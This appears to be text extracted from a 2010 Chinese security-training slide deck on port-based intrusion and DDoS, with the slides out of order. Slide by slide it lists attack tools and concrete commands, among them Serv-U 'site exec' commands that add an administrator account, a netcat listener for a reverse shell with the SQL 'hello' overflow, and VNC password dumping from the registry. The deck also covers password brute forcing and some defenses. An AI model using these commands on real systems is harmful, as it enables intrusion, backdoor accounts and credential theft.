端口入侵&攻击
All Rights Reserved© 2010 北京安氏领信科技发展有限公司
12
“3389”端口入侵
3389的入侵(2002年很容易),目前不太现实,微软等软件厂商的安全 意识在不断增强。 对很早的机器,可以试试3389的溢出。(win3389ex.exe) 对2003的机器,可以试试字典暴破。(tscrack.exe) 输入法漏洞。 过渡到“80端口入侵---提权增加3389的链接账户”。
10
“4899”端口入侵工具
4899:影子远程管理软件
All Rights Reserved© 2010 北京安氏领信科技发展有限公司
11
“4899”端口入侵
1、利用工具:扫描空口令(管理员的安全意识不高) 2、利用脚本漏洞:拿到“WEBSHELL”读取注册表的“radmin”密 码信息 读取的密码是“MD5” 加密的
22
DDOS讲解
国内外研究的现状 DOS问题的起因 DoS攻击原理 DoS防御方法 DDoS研究的意义
All Rights Reserved© 2010 北京安氏领信科技发展有限公司
23
研究现状
国内: 1) DHS , NFS在2004年资助几个大学和公司启动了 DETER(Defense Technology Experimental Research )。 这个项目的一个研究重点就是防御DDoS攻击。 2)信息产业部在2005年公开向产业界招标防御DDoS攻 击系统的设计方案
All Rights Reserved© 2010 北京安氏领信科技发展有限公司
16
“5631”端口入侵
5631端口 (赛门铁克公司):pcanywhere远程控制管理 拿到webshell找到*.cif文件破解管理密码 系统盘的 Documents andSettings/AllUsers/ApplicationData/Symantec/pcAnywhere/*.cif 防御:设置*.cif文件路径的访问权限
20
“53”端口入侵
53端口 :主要是dns溢出
All Rights Reserved© 2010 北京安氏领信科技发展有限公司
21
DDOS模拟攻击器讲解
All Rights Reserved© 2010 北京安氏领信科技发展有限公司
All Rights Reserved© 2010 北京安氏领信科技发展有限公司
24
DOS问题的起因
面向目的地址进行路由 Internet的无状态性 Internet缺乏身份鉴别机制 Internet协议的可预测性(例如, TCP连接建立过程和拥塞控制)
All Rights Reserved© 2010 北京安氏领信科技发展有限公司
15
“21”端口入侵
对5. 004及以下系统,可用溢出入侵。(serv5004.exe) 对5.1.0.0及以下系统,可用本地提升权限。(servlocal.exe) 对serv-u的MD5加密密码,可以用字典暴破。(crack.vbs) quote site exe "net user 1 1 /add" quote site exec "net localgroup administrators 1 /add" 输入一个被serv-u加密的密码(34位长),通过与字典档(dict.txt) 或者破解ftp密码上传webshell进一步提权 的比较,得到密码 防御:设置复杂密码,设置servu本地管理密码或更换其它的ftp服 务器软件,升级FTP软件到最新版本。
8
“1433”端口入侵工具
scanport.exe 查有1433的机器 SQLScanPass.exe 进行字典暴破(字典是关键) 最后 SQLTools.exe入侵 对sql的sp2及以下的系统,可用sql的hello 溢出漏洞入侵。 nc -vv -l -p 本机端口 sqlhelloF.exe 入侵ip 1433 本机ip 本机端口 (以上反向的) sqlhelloz.exe 入侵ip 1433 (这个是正向连接)
All Rights Reserved© 2010 北京安氏领信科技发展有限公司
27
UDP flood :UDP洪水
UDP flood最开始一般应用在针对UNIX类的服务器上,攻 击者通过伪造与某一主机的Chargen服务之间的一次的 UDP 连接,回复地址指向开着Echo 服务的一台主机,通 过将Chargen 和 Echo服务互指,来回传送毫无用处且占 满带宽的垃圾数据,在两台主机之间生成足够多的无用 数据流,这一拒绝服务攻击飞快地导致网络可用带宽耗 尽。
All Rights Reserved© 2010 北京安氏领信科技发展有限公司
3
查看开放端口信息
工具或者命令
命令:netstat –na 重定向举例:netstat –na >c:\1.txt
All Rights Reserved© 2010 北京安氏领信科技发展有限公司
可以利用SQL进行注入。(啊D的注入软件)
All Rights Reserved© 2010 北京安氏领信科技发展有限公司
14
“80”端口入侵
WEB脚本入侵漏洞总结: cross site scripting 跨站点脚本 source code disclosure 源代码公开 sql injection SQL注入 directories with execute permission enabled 目录的执行权限启用 CGI and scripting-related directories CGI脚本漏洞 Apache expect header cross-site scripting vulnerability Apache请求头 部 跨站漏洞 UNIX-Related directories UNIX相关目录暴露 Redirect unauthenticated and transmission 重定向未验证和传输 Directory traversal 目录遍历
WEB应用安全-端口入侵&攻击
宋克亚
高级安全技术顾问
北京安氏领信科技发展有限公司
LinkTrust Technologies Development Co,.Ltd
目录
一 二 三 四
端口讲解-端口的含义和作用
端口漏洞利用讲解
安全防范 基于端口攻击的“DDOS”讲解
All Rights Reserved© 2010 北京安氏领信科技发展有限公司
18
“5900”端口入侵
5900端口 :vnc 远程控制软件 1、溢出漏洞,直接用利用工具连接不用密码 2、拿到webshell读取注册表的password破解,登录 以下是两种VNC路径: 1:RealVNC的路径: HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4\Password D7 51 CC 73 31 24 7A 93 12 7C EF FA 6E 0B 7A D9 x4.exe -W 大写的W vncpwdump.exe -s 破解本机的VNC密码 vncpwdump.exe -k 得到的key进行破解 2:UltraVNC的路径: HKEY_LOCAL_MACHINE\SOFTWARE\ORL\WinVNC3\Default\password 设置注册表的访问权限
2
端口的含义与作用
操作系统的端口 :是指你一个软件如果要进行通信 必须需要操作 系统给一个端口才可以正常通讯 。 PC或者服务器之间用IP通讯。(专有核心网除外) 软件:端口一般都是软件定义的 不同的软件有着不同的端口 你可 以通过防火墙来设置端口的开关。 程序间通讯要用端口。 每一个网络通讯都会占用一个端口,共1-65535个端口。
All Rights Reserved© 2010 北京安氏领信科技发展有限公司
9
“1433”端口入侵工具
sqlhello溢出(首先利用“NC”工具) nc -vv -l -p 500 监听一个端口
作用:反弹端口
All Rights Reserved© 2010 北京安氏领信科技发展有限公司
All Rights Reserved© 2010 北京安氏领信科技发展有限公司
26
Teardrop:泪滴攻击
IP数据包在网络传递时,数据包可以分成更小的片段。 攻击者可以通过发送两段(或者更多)数据包来实现 TearDrop攻击。第一个包的偏移量为0,长度为N,第二 个包的偏移量小于N。为了合并这些数据段,TCP/IP堆栈 会分配超乎寻常的巨大资源,从而造成系统资源的缺乏 甚至机器的重新启动,达到攻击者需要的拒绝服务目的。
All Rights Reserved© 2010 北京安氏领信科技发展有限公司
17
“135”端口入侵
NTscan 扫描出密码 ,然后用Recton中马。
All Rights Reserved© 2010 北京安氏领信科技发展有限公司
6
查看端口工具
工具介绍:“aio” 命令举例:aio -mport
All Rights Reserved© 2010 北京安氏领信科技发展有限公司
7
常见端口的入侵
All Rights Reserved© 2010 北京安氏领信科技发展有限公司
All Rights Reserved© 2010 北京安氏领信科技发展有限公司
13
“80”端口入侵
WEB脚本入侵(通过脚本漏洞来实现)
例举:
对sp3以前的机器,可以用webdav入侵;
对bbs论坛,可以试试上传漏洞(upfile.exe或dvup_delphi.exe)
